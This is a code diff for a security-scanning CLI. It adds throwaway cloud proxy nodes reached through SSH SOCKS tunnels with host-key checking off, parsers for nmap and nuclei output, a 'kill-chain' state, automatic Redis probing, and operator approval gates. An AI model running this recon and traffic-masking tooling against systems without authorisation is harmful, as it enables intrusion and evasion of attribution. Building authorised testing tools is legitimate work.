     "TaskExecutor",
     "TaskOutput",
diff --git a/packages/cli/src/opentools/scanner/executor/proxied_shell.py b/packages/cli/src/opentools/scanner/executor/proxied_shell.py
new file mode 100644
index 0000000..de1c196
--- /dev/null
+++ b/packages/cli/src/opentools/scanner/executor/proxied_shell.py
@@ -0,0 +1,58 @@
+"""ProxiedShellExecutor — optionally routes tool traffic through ephemeral proxy."""
+from __future__ import annotations
+import shlex
+from typing import Callable
+from opentools.scanner.cancellation import CancellationToken
+from opentools.scanner.executor.base import TaskOutput
+from opentools.scanner.infra.provider import CloudNodeProvider
+from opentools.scanner.infra.proxy import ephemeral_proxy
+from opentools.scanner.models import ScanTask, TaskIsolation
+from opentools.shared.subprocess import run_streaming
+
+class ProxiedShellExecutor:
+    """Shell executor with optional ephemeral proxy routing.
+    Tasks with isolation == NETWORK_ISOLATED are routed through proxy.
+    All others run as plain subprocesses."""
+
+    def __init__(
+        self, provider: CloudNodeProvider | None,
+        ssh_key: str = "", ssh_key_path: str = "~/.ssh/id_ed25519",
+        default_timeout: int = 300, base_socks_port: int = 10800,
+        _skip_tunnel: bool = False,
+    ) -> None:
+        self._provider = provider
+        self._ssh_key = ssh_key
+        self._ssh_key_path = ssh_key_path
+        self._default_timeout = default_timeout
+        self._base_socks_port = base_socks_port
+        self._port_counter = 0
+        self._skip_tunnel = _skip_tunnel
+
+    def _next_socks_port(self) -> int:
+        port = self._base_socks_port + self._port_counter
+        self._port_counter += 1
+        return port
+
+    async def execute(self, task: ScanTask, on_output: Callable[[bytes], None], cancellation: CancellationToken) -> TaskOutput:
+        if task.command is None:
+            raise ValueError(f"Task {task.id} has no command")
+        needs_proxy = self._provider is not None and task.isolation == TaskIsolation.NETWORK_ISOLATED
+        if not needs_proxy:
+            return await self._run_direct(task, on_output, cancellation)
+        return await self._run_proxied(task, on_output, cancellation)
+
+    async def _run_direct(self, task, on_output, cancellation) -> TaskOutput:
+        args = shlex.split(task.command)
+        result = await run_streaming(args=args, on_output=on_output, timeout=self._default_timeout, cancellation=cancellation)
+        return TaskOutput(exit_code=result.exit_code, stdout=result.stdout, stderr=result.stderr, duration_ms=result.duration_ms)
+
+    async def _run_proxied(self, task, on_output, cancellation) -> TaskOutput:
+        socks_port = self._next_socks_port()
+        async with ephemeral_proxy(
+            provider=self._provider, region="nyc3", ssh_key=self._ssh_key,
+            ssh_key_path=self._ssh_key_path, local_socks_port=socks_port,
+            scan_id=task.scan_id, _skip_tunnel=self._skip_tunnel,
+        ) as proxy:
+            args = shlex.split(task.command)
+            result = await run_streaming(args=args, on_output=on_output, timeout=self._default_timeout, cancellation=cancellation, env=proxy.env)
+        return TaskOutput(exit_code=result.exit_code, stdout=result.stdout, stderr=result.stderr, duration_ms=result.duration_ms)
diff --git a/packages/cli/src/opentools/scanner/infra/__init__.py b/packages/cli/src/opentools/scanner/infra/__init__.py
new file mode 100644
index 0000000..0a830d8
--- /dev/null
+++ b/packages/cli/src/opentools/scanner/infra/__init__.py
@@ -0,0 +1,22 @@
+"""Ephemeral infrastructure provisioning for proxied scan execution."""
+from opentools.scanner.infra.provider import (
+    CloudNodeProvider,
+    EphemeralNode,
+    ProvisioningError,
+    ProvisioningTimeout,
+)
+from opentools.scanner.infra.digitalocean import DigitalOceanProvider
+from opentools.scanner.infra.vultr import VultrProvider
+from opentools.scanner.infra.proxy import ProxyEndpoint, ephemeral_proxy, PROXY_TAG
+
+__all__ = [
+    "CloudNodeProvider",
+    "DigitalOceanProvider",
+    "EphemeralNode",
+    "PROXY_TAG",
+    "ProvisioningError",
+    "ProvisioningTimeout",
+    "ProxyEndpoint",
+    "VultrProvider",
+    "ephemeral_proxy",
+]
diff --git a/packages/cli/src/opentools/scanner/infra/digitalocean.py b/packages/cli/src/opentools/scanner/infra/digitalocean.py
new file mode 100644
index 0000000..af6945b
--- /dev/null
+++ b/packages/cli/src/opentools/scanner/infra/digitalocean.py
@@ -0,0 +1,58 @@
+"""DigitalOcean CloudNodeProvider implementation."""
+from __future__ import annotations
+import uuid
+
+import httpx
+
+from opentools.scanner.infra.provider import CloudNodeProvider
+
+
+class DigitalOceanProvider(CloudNodeProvider):
+    def __init__(self, client: httpx.AsyncClient) -> None:
+        self._client = client
+
+    @classmethod
+    def from_token(cls, api_token: str) -> DigitalOceanProvider:
+        client = httpx.AsyncClient(
+            base_url="https://api.digitalocean.com/v2",
+            headers={"Authorization": f"Bearer {api_token}"},
+            timeout=30.0,
+        )
+        return cls(client=client)
+
+    async def create_node(
+        self,
+        region: str,
+        ssh_public_key: str,
+        tags: list[str],
+    ) -> str:
+        resp = await self._client.post(
+            "/droplets",
+            json={
+                "name": f"ot-proxy-{uuid.uuid4().hex[:8]}",
+                "region": region,
+                "size": "s-1vcpu-512mb-10gb",
+                "image": "ubuntu-24-04-x64",
+                "ssh_keys": [ssh_public_key],
+                "tags": tags,
+            },
+        )
+        resp.raise_for_status()
+        return str(resp.json()["droplet"]["id"])
+
+    async def poll_status(self, provider_id: str) -> tuple[str, str | None]:
+        resp = await self._client.get(f"/droplets/{provider_id}")
+        resp.raise_for_status()
+        droplet = resp.json()["droplet"]
+        status = "active" if droplet["status"] == "active" else "creating"
+        ip = None
+        for net in droplet.get("networks", {}).get("v4", []):
+            if net.get("type") == "public":
+                ip = net["ip_address"]
+                break
+        return status, ip
+
+    async def destroy_node(self, provider_id: str) -> None:
+        resp = await self._client.delete(f"/droplets/{provider_id}")
+        if resp.status_code not in (204, 404):
+            resp.raise_for_status()
diff --git a/packages/cli/src/opentools/scanner/infra/provider.py b/packages/cli/src/opentools/scanner/infra/provider.py
new file mode 100644
index 0000000..07e43da
--- /dev/null
+++ b/packages/cli/src/opentools/scanner/infra/provider.py
@@ -0,0 +1,61 @@
+"""CloudNodeProvider ABC and shared types for ephemeral infrastructure."""
+from __future__ import annotations
+import asyncio
+import logging
+from abc import ABC, abstractmethod
+from typing import Any
+
+from pydantic import BaseModel, Field
+
+logger = logging.getLogger(__name__)
+
+
+class EphemeralNode(BaseModel):
+    provider_id: str
+    ip_address: str
+    region: str
+    ssh_key_fingerprint: str
+    tags: list[str] = Field(default_factory=list)
+    metadata: dict[str, Any] = Field(default_factory=dict)
+
+
+class ProvisioningError(Exception):
+    pass
+
+
+class ProvisioningTimeout(ProvisioningError):
+    pass
+
+
+class CloudNodeProvider(ABC):
+    @abstractmethod
+    async def create_node(self, region: str, ssh_public_key: str, tags: list[str]) -> str: ...
+
+    @abstractmethod
+    async def poll_status(self, provider_id: str) -> tuple[str, str | None]: ...
+
+    @abstractmethod
+    async def destroy_node(self, provider_id: str) -> None: ...
+
+    async def wait_until_ready(
+        self,
+        provider_id: str,
+        poll_interval: float = 3.0,
+        max_polls: int = 60,
+    ) -> str:
+        for attempt in range(max_polls):
+            status, ip = await self.poll_status(provider_id)
+            if status == "active" and ip is not None:
+                logger.info(
+                    "Node %s ready at %s after %d polls",
+                    provider_id,
+                    ip,
+                    attempt + 1,
+                )
+                return ip
+            if status == "error":
+                raise ProvisioningError(f"Node {provider_id} entered error state")
+            await asyncio.sleep(poll_interval)
+        raise ProvisioningTimeout(
+            f"Node {provider_id} not ready after {max_polls * poll_interval:.0f}s"
+        )
diff --git a/packages/cli/src/opentools/scanner/infra/proxy.py b/packages/cli/src/opentools/scanner/infra/proxy.py
new file mode 100644
index 0000000..16319ef
--- /dev/null
+++ b/packages/cli/src/opentools/scanner/infra/proxy.py
@@ -0,0 +1,115 @@
+"""Ephemeral proxy context manager with guaranteed teardown.
+
+Usage::
+    async with ephemeral_proxy(provider, ...) as endpoint:
+        result = await run_streaming(args, on_output, env=endpoint.env)
+    # Node is destroyed here, guaranteed.
+"""
+from __future__ import annotations
+import asyncio, logging, os
+from contextlib import asynccontextmanager
+from typing import AsyncIterator
+from opentools.scanner.infra.provider import CloudNodeProvider, ProvisioningError
+
+logger = logging.getLogger(__name__)
+PROXY_TAG = "opentools-ephemeral-proxy"
+
+class ProxyEndpoint:
+    """Usable result of a provisioned proxy — env vars for subprocess injection."""
+    def __init__(self, host: str, socks_port: int) -> None:
+        self.host = host
+        self.socks_port = socks_port
+
+    @property
+    def env(self) -> dict[str, str]:
+        proxy_url = f"socks5://127.0.0.1:{self.socks_port}"
+        return {
+            **os.environ,
+            "HTTP_PROXY": proxy_url, "HTTPS_PROXY": proxy_url,
+            "http_proxy": proxy_url, "https_proxy": proxy_url,
+            "ALL_PROXY": proxy_url,
+        }
+
+@asynccontextmanager
+async def ephemeral_proxy(
+    provider: CloudNodeProvider,
+    region: str = "nyc3",
+    ssh_key: str = "",
+    ssh_key_path: str = "~/.ssh/id_ed25519",
+    local_socks_port: int = 10800,
+    scan_id: str = "",
+    _skip_tunnel: bool = False,  # for unit testing
+) -> AsyncIterator[ProxyEndpoint]:
+    """Provision proxy, optionally tunnel, yield endpoint. GUARANTEES teardown."""
+    tags = [PROXY_TAG, f"scan:{scan_id}"]
+    provider_id: str | None = None
+    tunnel_proc: asyncio.subprocess.Process | None = None
+
+    try:
+        provider_id = await provider.create_node(region=region, ssh_public_key=ssh_key, tags=tags)
+        logger.info("Provisioning node %s in %s", provider_id, region)
+        ip_address = await provider.wait_until_ready(provider_id)
+
+        if not _skip_tunnel:
+            tunnel_proc = await _establish_tunnel(ip_address, ssh_key_path, local_socks_port)
+
+        endpoint = ProxyEndpoint(host=ip_address, socks_port=local_socks_port)
+        logger.info("Proxy ready: 127.0.0.1:%d → %s (node %s)", local_socks_port, ip_address, provider_id)
+        yield endpoint
+    finally:
+        if tunnel_proc is not None and tunnel_proc.returncode is None:
+            tunnel_proc.terminate()
+            try:
+                await asyncio.wait_for(tunnel_proc.wait(), timeout=5.0)
+            except asyncio.TimeoutError:
+                tunnel_proc.kill()
+                await tunnel_proc.wait()
+            logger.info("SSH tunnel terminated")
+
+        if provider_id is not None:
+            await _shielded_destroy(provider, provider_id)
+
+async def _shielded_destroy(provider: CloudNodeProvider, provider_id: str) -> None:
+    """Destroy node, shielded from asyncio.CancelledError.
+    Pattern: create concrete Task, shield it, if cancelled await task directly."""
+    destroy_task = asyncio.ensure_future(provider.destroy_node(provider_id))
+    try:
+        await asyncio.shield(destroy_task)
+        logger.info("Node %s destroyed", provider_id)
+    except asyncio.CancelledError:
+        try:
+            await destroy_task
+            logger.info("Node %s destroyed (post-cancellation)", provider_id)
+        except Exception:
+            logger.exception("Failed to destroy node %s during cancellation", provider_id)
+        raise
+    except Exception:
+        logger.exception("Failed to destroy node %s", provider_id)
+
+async def _establish_tunnel(
+    ip_address: str, ssh_key_path: str, local_port: int,
+    max_retries: int = 5, retry_delay: float = 3.0,
+) -> asyncio.subprocess.Process:
+    """Start SSH dynamic SOCKS5 tunnel with retry for sshd startup race."""
+    expanded_key = os.path.expanduser(ssh_key_path)
+    for attempt in range(max_retries):
+        proc = await asyncio.create_subprocess_exec(
+            "ssh", "-D", str(local_port), "-N",
+            "-o", "StrictHostKeyChecking=no", "-o", "UserKnownHostsFile=/dev/null",
+            "-o", "ConnectTimeout=10", "-o", "ServerAliveInterval=15",
+            "-o", "ServerAliveCountMax=3", "-o", "ExitOnForwardFailure=yes",
+            "-i", expanded_key, f"root@{ip_address}",
+            stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE,
+        )
+        await asyncio.sleep(2.0)
+        if proc.returncode is None:
+            return proc
+        stderr = b""
+        if proc.stderr:
+            stderr = await proc.stderr.read()
+        if attempt < max_retries - 1:
+            logger.debug("SSH attempt %d failed: %s", attempt + 1, stderr.decode(errors="replace").strip())
+            await asyncio.sleep(retry_delay)
+            continue
+        raise ProvisioningError(f"SSH tunnel failed after {max_retries} attempts: {stderr.decode(errors='replace')}")
+    raise ProvisioningError("SSH tunnel failed: exhausted retries")
diff --git a/packages/cli/src/opentools/scanner/infra/sweeper.py b/packages/cli/src/opentools/scanner/infra/sweeper.py
new file mode 100644
index 0000000..2c3e0b2
--- /dev/null
+++ b/packages/cli/src/opentools/scanner/infra/sweeper.py
@@ -0,0 +1,27 @@
+"""Startup sweeper for orphaned ephemeral proxy nodes."""
+from __future__ import annotations
+import logging
+from opentools.scanner.infra.proxy import PROXY_TAG
+
+logger = logging.getLogger(__name__)
+
+async def sweep_orphaned_nodes(provider: object) -> int:
+    """Destroy nodes tagged with PROXY_TAG from previous runs.
+    Provider must implement list_nodes_by_tag(tag) and destroy_node(id).
+    Returns count of nodes successfully destroyed."""
+    if not hasattr(provider, "list_nodes_by_tag"):
+        logger.debug("Provider does not support list_nodes_by_tag, skipping sweep")
+        return 0
+    orphan_ids = await provider.list_nodes_by_tag(PROXY_TAG)
+    if not orphan_ids:
+        return 0
+    logger.info("Found %d orphaned proxy nodes to sweep", len(orphan_ids))
+    destroyed = 0
+    for node_id in orphan_ids:
+        try:
+            await provider.destroy_node(node_id)
+            destroyed += 1
+            logger.info("Destroyed orphaned node %s", node_id)
+        except Exception:
+            logger.exception("Failed to destroy orphaned node %s", node_id)
+    return destroyed
diff --git a/packages/cli/src/opentools/scanner/infra/vultr.py b/packages/cli/src/opentools/scanner/infra/vultr.py
new file mode 100644
index 0000000..aa81aa5
--- /dev/null
+++ b/packages/cli/src/opentools/scanner/infra/vultr.py
@@ -0,0 +1,71 @@
+"""VultrProvider — ephemeral Vultr instance provisioning via REST API.
+
+IMPORTANT: sshkey_id array is REQUIRED. Without it, SSH tunnel fails.
+"""
+from __future__ import annotations
+import uuid
+
+import httpx
+
+from opentools.scanner.infra.provider import CloudNodeProvider
+
+
+class VultrProvider(CloudNodeProvider):
+    def __init__(self, client: httpx.AsyncClient) -> None:
+        self._client = client
+
+    @classmethod
+    def from_token(cls, api_token: str) -> VultrProvider:
+        client = httpx.AsyncClient(
+            base_url="https://api.vultr.com/v2",
+            headers={"Authorization": f"Bearer {api_token}"},
+            timeout=30.0,
+        )
+        return cls(client=client)
+
+    async def create_node(
+        self,
+        region: str,
+        ssh_public_key: str,
+        tags: list[str],
+    ) -> str:
+        """ssh_public_key must be a Vultr SSH key UUID (pre-registered)."""
+        resp = await self._client.post(
+            "/instances",
+            json={
+                "region": region,
+                "plan": "vc2-1c-0.5gb",
+                "os_id": 2284,  # Ubuntu 24.04 LTS
+                "label": f"ot-proxy-{uuid.uuid4().hex[:8]}",
+                "sshkey_id": [ssh_public_key],  # REQUIRED for tunnel auth
+                "tags": tags,
+                "backups": "disabled",
+                "activation_email": False,
+            },
+        )
+        resp.raise_for_status()
+        return resp.json()["instance"]["id"]
+
+    async def poll_status(self, provider_id: str) -> tuple[str, str | None]:
+        resp = await self._client.get(f"/instances/{provider_id}")
+        resp.raise_for_status()
+        inst = resp.json()["instance"]
+        # Vultr can report "active" before IP is assigned — guard against 0.0.0.0
+        if (
+            inst.get("status") == "active"
+            and inst.get("power_status") == "running"
+            and inst.get("main_ip", "0.0.0.0") != "0.0.0.0"
+        ):
+            return "active", inst["main_ip"]
+        return "creating", None
+
+    async def destroy_node(self, provider_id: str) -> None:
+        resp = await self._client.delete(f"/instances/{provider_id}")
+        if resp.status_code not in (204, 404):
+            resp.raise_for_status()
+
+    async def list_nodes_by_tag(self, tag: str) -> list[str]:
+        """List instance IDs with given tag (for orphan sweeping)."""
+        resp = await self._client.get("/instances", params={"tag": tag})
+        resp.raise_for_status()
+        return [inst["id"] for inst in resp.json().get("instances", [])]
diff --git a/packages/cli/src/opentools/scanner/models.py b/packages/cli/src/opentools/scanner/models.py
index 52b40de..702963b 100644
--- a/packages/cli/src/opentools/scanner/models.py
+++ b/packages/cli/src/opentools/scanner/models.py
@@ -58,6 +58,7 @@ class TaskStatus(StrEnum):
     COMPLETED = "completed"
     FAILED = "failed"
     SKIPPED = "skipped"
+    AWAITING_APPROVAL = "awaiting_approval"
 
 
 class ExecutionTier(StrEnum):
@@ -185,6 +186,12 @@ class GraphSnapshot(BaseModel):
     finding_count: int = 0
 
 
+class ApprovalRequirement(BaseModel):
+    """Gate metadata for tasks requiring operator approval before execution."""
+    timeout_seconds: int = 3600
+    description: str = ""
+
+
 class ReactiveEdge(BaseModel):
     id: str
     trigger_task_id: str
@@ -229,6 +236,9 @@ class ScanTask(BaseModel):
     spawned_reason: Optional[str] = None
     started_at: Optional[datetime] = None
     completed_at: Optional[datetime] = None
+    requires_approval: Optional[ApprovalRequirement] = None
+    approval_ticket_id: Optional[str] = None
+    approval_expires_at: Optional[datetime] = None
 
 
 class Scan(BaseModel):
diff --git a/packages/cli/src/opentools/scanner/mutation/__init__.py b/packages/cli/src/opentools/scanner/mutation/__init__.py
new file mode 100644
index 0000000..02f5f81
--- /dev/null
+++ b/packages/cli/src/opentools/scanner/mutation/__init__.py
@@ -0,0 +1,10 @@
+"""Dynamic DAG mutation layer — output analysis, state accumulation, task synthesis."""
+
+from opentools.scanner.mutation.models import (
+    DiscoveredService,
+    DiscoveredVuln,
+    IntelBundle,
+    KillChainState,
+)
+
+__all__ = ["DiscoveredService", "DiscoveredVuln", "IntelBundle", "KillChainState"]
diff --git a/packages/cli/src/opentools/scanner/mutation/analyzer.py b/packages/cli/src/opentools/scanner/mutation/analyzer.py
new file mode 100644
index 0000000..57700f8
--- /dev/null
+++ b/packages/cli/src/opentools/scanner/mutation/analyzer.py
@@ -0,0 +1,177 @@
+"""OutputAnalyzer protocol and built-in analyzers for Nmap and Nuclei."""
+from __future__ import annotations
+
+import json
+import xml.etree.ElementTree as ET
+from typing import Protocol, runtime_checkable
+
+from opentools.scanner.mutation.models import (
+    DiscoveredService,
+    DiscoveredVuln,
+    IntelBundle,
+)
+
+
+@runtime_checkable
+class OutputAnalyzer(Protocol):
+    """Protocol for extracting structured intel from raw tool stdout/stderr."""
+
+    tool: str
+
+    def analyze(self, stdout: str, stderr: str) -> IntelBundle:
+        """Parse tool output and return structured intel."""
+        ...
+
+
+class NmapAnalyzer:
+    """Parses nmap XML output (``-oX`` format) into an IntelBundle.
+
+    Extracts open ports as DiscoveredService objects.  Closed/filtered ports
+    are silently skipped.  Returns an empty IntelBundle on invalid XML or
+    empty stdout.
+    """
+
+    tool: str = "nmap"
+
+    def analyze(self, stdout: str, stderr: str) -> IntelBundle:
+        if not stdout.strip():
+            return IntelBundle()
+
+        try:
+            root = ET.fromstring(stdout)
+        except ET.ParseError:
+            return IntelBundle()
+
+        if root.tag != "nmaprun":
+            return IntelBundle()
+
+        services: list[DiscoveredService] = []
+
+        for host in root.findall("host"):
+            addr_el = host.find("address")
+            addr = addr_el.get("addr", "unknown") if addr_el is not None else "unknown"
+
+            ports_el = host.find("ports")
+            if ports_el is None:
+                continue
+
+            for port in ports_el.findall("port"):
+                state_el = port.find("state")
+                if state_el is None:
+                    continue
+                if state_el.get("state", "") != "open":
+                    continue
+
+                protocol = port.get("protocol", "tcp")
+                portid_str = port.get("portid", "0")
+                try:
+                    portid = int(portid_str)
+                except ValueError:
+                    portid = 0
+
+                service_el = port.find("service")
+                service_name = ""
+                product: str | None = None
+                version: str | None = None
+                if service_el is not None:
+                    service_name = service_el.get("name", "")
+                    raw_product = service_el.get("product", "")
+                    product = raw_product if raw_product else None
+                    raw_version = service_el.get("version", "")
+                    version = raw_version if raw_version else None
+
+                services.append(
+                    DiscoveredService(
+                        host=addr,
+                        port=portid,
+                        protocol=protocol,
+                        service=service_name,
+                        product=product,
+                        version=version,
+                    )
+                )
+
+        return IntelBundle(services=services)
+
+
+class NucleiAnalyzer:
+    """Parses nuclei JSON-lines output into an IntelBundle.
+
+    Each line is expected to be a JSON object.  Invalid JSON lines are silently
+    skipped.  Extracts DiscoveredVuln objects and collects ``matched-at`` URLs.
+    """
+
+    tool: str = "nuclei"
+
+    def analyze(self, stdout: str, stderr: str) -> IntelBundle:
+        if not stdout.strip():
+            return IntelBundle()
+
+        vulns: list[DiscoveredVuln] = []
+        urls: list[str] = []
+
+        for line in stdout.splitlines():
+            line = line.strip()
+            if not line:
+                continue
+            try:
+                obj = json.loads(line)
+            except json.JSONDecodeError:
+                continue
+
+            template_id = obj.get("template-id", "")
+            host = obj.get("host", "")
+            matched_at = obj.get("matched-at", "")
+
+            # Port: prefer explicit "port" key, fall back to None
+            raw_port = obj.get("port")
+            port: int | None = None
+            if raw_port is not None:
+                try:
+                    port = int(raw_port)
+                except (ValueError, TypeError):
+                    port = None
+
+            info = obj.get("info", {})
+            severity = info.get("severity", "unknown") if isinstance(info, dict) else "unknown"
+
+            extracted_results = obj.get("extracted-results")
+            extracted_data: dict = {}
+            if isinstance(extracted_results, list) and extracted_results:
+                extracted_data["extracted_results"] = extracted_results
+
+            vulns.append(
+                DiscoveredVuln(
+                    host=host,
+                    port=port,
+                    template_id=template_id,
+                    severity=severity,
+                    matched_at=matched_at,
+                    extracted_data=extracted_data,
+                )
+            )
+
+            if matched_at:
+                urls.append(matched_at)
+
+        return IntelBundle(vulns=vulns, urls=urls)
+
+
+class AnalyzerRegistry:
+    """Simple registry mapping tool names to OutputAnalyzer instances."""
+
+    def __init__(self) -> None:
+        self._registry: dict[str, OutputAnalyzer] = {}
+
+    def register(self, analyzer: OutputAnalyzer) -> None:
+        """Register an analyzer, keyed by its ``tool`` attribute."""
+        self._registry[analyzer.tool] = analyzer
+
+    def get(self, tool: str) -> OutputAnalyzer | None:
+        """Return the analyzer for *tool*, or None if not registered."""
+        return self._registry.get(tool)
+
+    def register_builtins(self) -> None:
+        """Register the built-in NmapAnalyzer and NucleiAnalyzer."""
+        self.register(NmapAnalyzer())
+        self.register(NucleiAnalyzer())
diff --git a/packages/cli/src/opentools/scanner/mutation/models.py b/packages/cli/src/opentools/scanner/mutation/models.py
new file mode 100644
index 0000000..e6e49a2
--- /dev/null
+++ b/packages/cli/src/opentools/scanner/mutation/models.py
@@ -0,0 +1,68 @@
+"""Data models for kill-chain state accumulation and per-task intel extraction."""
+from __future__ import annotations
+
+from typing import Any
+
+from pydantic import BaseModel, Field
+
+
+class DiscoveredService(BaseModel):
+    """A network service discovered by a scanning tool."""
+
+    host: str
+    port: int
+    protocol: str  # "tcp" | "udp"
+    service: str  # e.g., "redis", "http", "ssh"
+    product: str | None = None
+    version: str | None = None
+    banner: str | None = None
+
+
+class DiscoveredVuln(BaseModel):
+    """A vulnerability discovered by a scanning tool."""
+
+    host: str
+    port: int | None
+    template_id: str
+    severity: str
+    matched_at: str
+    extracted_data: dict[str, Any] = Field(default_factory=dict)
+
+
+class IntelBundle(BaseModel):
+    """Structured intelligence extracted from a single task's output."""
+
+    services: list[DiscoveredService] = Field(default_factory=list)
+    vulns: list[DiscoveredVuln] = Field(default_factory=list)
+    urls: list[str] = Field(default_factory=list)
+    metadata: dict[str, Any] = Field(default_factory=dict)
+
+
+class KillChainState(BaseModel):
+    """Accumulated attack surface knowledge across all completed tasks."""
+
+    services: dict[str, DiscoveredService] = Field(default_factory=dict)
+    vulns: dict[str, DiscoveredVuln] = Field(default_factory=dict)
+    urls: set[str] = Field(default_factory=set)
+    tasks_spawned: dict[str, int] = Field(default_factory=dict)
+    total_spawned: int = 0
+
+    def ingest(self, bundle: IntelBundle) -> None:
+        for svc in bundle.services:
+            key = f"{svc.host}:{svc.port}/{svc.protocol}"
+            self.services[key] = svc
+        for vuln in bundle.vulns:
+            port_part = str(vuln.port) if vuln.port is not None else "noport"
+            key = f"{vuln.host}:{port_part}:{vuln.template_id}"
+            self.vulns[key] = vuln
+        self.urls.update(bundle.urls)
+
+    def has_service(self, service_name: str) -> bool:
+        return any(s.service == service_name for s in self.services.values())
+
+    def get_services(self, service_name: str) -> list[DiscoveredService]:
+        return [s for s in self.services.values() if s.service == service_name]
+
+    def record_spawn(self, strategy_name: str, count: int = 1) -> None:
+        self.tasks_spawned[strategy_name] = self.tasks_spawned.get(strategy_name, 0) + count
+        self.total_spawned += count
diff --git a/packages/cli/src/opentools/scanner/mutation/strategy.py b/packages/cli/src/opentools/scanner/mutation/strategy.py
new file mode 100644
index 0000000..3136efd
--- /dev/null
+++ b/packages/cli/src/opentools/scanner/mutation/strategy.py
@@ -0,0 +1,118 @@
+"""MutationStrategy protocol and built-in strategy implementations."""
+from __future__ import annotations
+
+import re
+from typing import Protocol, runtime_checkable
+
+from opentools.scanner.models import ExecutionTier, ScanTask, TaskType
+from opentools.scanner.mutation.models import KillChainState
+
+_SAFE_HOST_RE = re.compile(r'^[\w.\-:\[\]]+$')  # alphanumeric, dots, hyphens, colons, brackets (IPv6)
+
+
+def _validate_host(host: str) -> bool:
+    """Reject hosts containing shell metacharacters."""
+    return bool(_SAFE_HOST_RE.match(host)) and len(host) <= 253
+
+
+@runtime_checkable
+class MutationStrategy(Protocol):
+    """Protocol for strategies that synthesize new ScanTasks from accumulated state.
+
+    Each strategy examines the current KillChainState (all accumulated intel)
+    and a recently completed task, then returns zero or more new tasks to inject
+    into the engine.
+    """
+
+    name: str
+    max_spawns: int
+
+    def evaluate(
+        self,
+        state: KillChainState,
+        scan_id: str,
+        completed_task: ScanTask,
+    ) -> list[ScanTask]:
+        """Return new tasks to spawn based on current state and the completed task.
+
+        Args:
+            state: Accumulated kill-chain intel from all completed tasks so far.
+            scan_id: The active scan's ID, used to populate spawned task scan_id.
+            completed_task: The task that just completed, triggering this evaluation.
+
+        Returns:
+            A list of new ScanTask objects to inject.  May be empty.
+        """
+        ...
+
+
+class RedisProbeStrategy:
+    """Spawns ``redis-cli INFO`` probe tasks when nmap/masscan discovers Redis.
+
+    Fires only when the completed task's tool is in ``_TRIGGER_TOOLS``.  Uses
+    self-tracking (``_spawned_keys``) to avoid emitting duplicate tasks across
+    multiple evaluate() calls — idempotent without engine callbacks.
+    """
+
+    name: str = "redis_probe"
+    max_spawns: int = 10
+
+    _TRIGGER_TOOLS: frozenset[str] = frozenset({"nmap", "masscan"})
+
+    def __init__(self) -> None:
+        self._spawned_keys: set[str] = set()
+
+    def evaluate(
+        self,
+        state: KillChainState,
+        scan_id: str,
+        completed_task: ScanTask,
+    ) -> list[ScanTask]:
+        """Inspect state for Redis services and spawn probes for unseen ones.
+
+        Only fires when the triggering task's tool is nmap or masscan.
+        Each Redis service is probed at most once per strategy instance.
+        """
+        if completed_task.tool not in self._TRIGGER_TOOLS:
+            return []
+
+        redis_services = state.get_services("redis")
+        new_tasks: list[ScanTask] = []
+
+        for svc in redis_services:
+            if not _validate_host(svc.host):
+                continue
+
+            key = f"{svc.host}:{svc.port}"
+            if key in self._spawned_keys:
+                continue
+
+            # Mark spawned *before* appending so re-entrant calls are safe.
+            self._spawned_keys.add(key)
+
+            host = svc.host
+            port = svc.port
+            task_id = f"redis-probe-{host}-{port}"
+
+            new_tasks.append(
+                ScanTask(
+                    id=task_id,
+                    scan_id=scan_id,
+                    name=f"Redis INFO probe {host}:{port}",
+                    tool="redis-cli",
+                    task_type=TaskType.DOCKER_EXEC,
+                    command=f"redis-cli -h {host} -p {port} INFO",
+                    depends_on=[completed_task.id],
+                    priority=20,
+                    tier=ExecutionTier.FAST,
+                    spawned_by=completed_task.id,
+                    spawned_reason=f"nmap discovered Redis on {host}:{port}",
+                )
+            )
+
+        return new_tasks
+
+
+def get_builtin_strategies() -> list[RedisProbeStrategy]:
+    """Return a list of all built-in MutationStrategy instances."""
+    return [RedisProbeStrategy()]
diff --git a/packages/cli/src/opentools/shared/subprocess.py b/packages/cli/src/opentools/shared/subprocess.py
index ad7acb7..45626a4 100644
--- a/packages/cli/src/opentools/shared/subprocess.py
+++ b/packages/cli/src/opentools/shared/subprocess.py
@@ -45,6 +45,7 @@ async def run_streaming(
     on_output: Callable[[bytes], None],
     timeout: int = 300,
     cancellation: object | None = None,  # CancellationToken
+    env: dict[str, str] | None = None,
 ) -> SubprocessResult:
     """Spawn an async subprocess and stream its stdout in 4 KiB chunks.
 
@@ -69,6 +70,7 @@ async def run_streaming(
             *args,
             stdout=asyncio.subprocess.PIPE,
             stderr=asyncio.subprocess.PIPE,
+            env=env,
         )
     except FileNotFoundError as exc:
         elapsed_ms = (time.monotonic_ns() - start_ns) // 1_000_000
diff --git a/packages/cli/tests/test_scanner/test_approval_models.py b/packages/cli/tests/test_scanner/test_approval_models.py
new file mode 100644
index 0000000..07f6221
--- /dev/null
+++ b/packages/cli/tests/test_scanner/test_approval_models.py
@@ -0,0 +1,44 @@
+"""Tests for HITL approval gate model additions."""
+from datetime import datetime, timezone
+from opentools.scanner.models import (
+    ApprovalRequirement, ScanTask, TaskStatus, TaskType,
+)
+
+class TestApprovalRequirement:
+    def test_defaults(self):
+        req = ApprovalRequirement()
+        assert req.timeout_seconds == 3600
+        assert req.description == ""
+
+    def test_custom_values(self):
+        req = ApprovalRequirement(timeout_seconds=600, description="Deploy agent")
+        assert req.timeout_seconds == 600
+        assert req.description == "Deploy agent"
+
+class TestTaskStatusApproval:
+    def test_awaiting_approval_value(self):
+        assert TaskStatus.AWAITING_APPROVAL == "awaiting_approval"
+
+    def test_awaiting_approval_in_enum(self):
+        assert "awaiting_approval" in [s.value for s in TaskStatus]
+
+class TestScanTaskApprovalFields:
+    def test_requires_approval_default_none(self):
+        task = ScanTask(id="t1", scan_id="s1", name="test", tool="nmap", task_type=TaskType.SHELL)
+        assert task.requires_approval is None
+        assert task.approval_ticket_id is None
+        assert task.approval_expires_at is None
+
+    def test_requires_approval_set(self):
+        req = ApprovalRequirement(timeout_seconds=1800, description="Dangerous")
+        task = ScanTask(id="t1", scan_id="s1", name="test", tool="c2", task_type=TaskType.SHELL, requires_approval=req)
+        assert task.requires_approval.timeout_seconds == 1800
+
+    def test_approval_ticket_fields(self):
+        task = ScanTask(
+            id="t1", scan_id="s1", name="test", tool="nmap", task_type=TaskType.SHELL,
+            approval_ticket_id="gate-t1-abc123",
+            approval_expires_at=datetime(2026, 4, 13, 15, 0, 0, tzinfo=timezone.utc),
+        )
+        assert task.approval_ticket_id == "gate-t1-abc123"
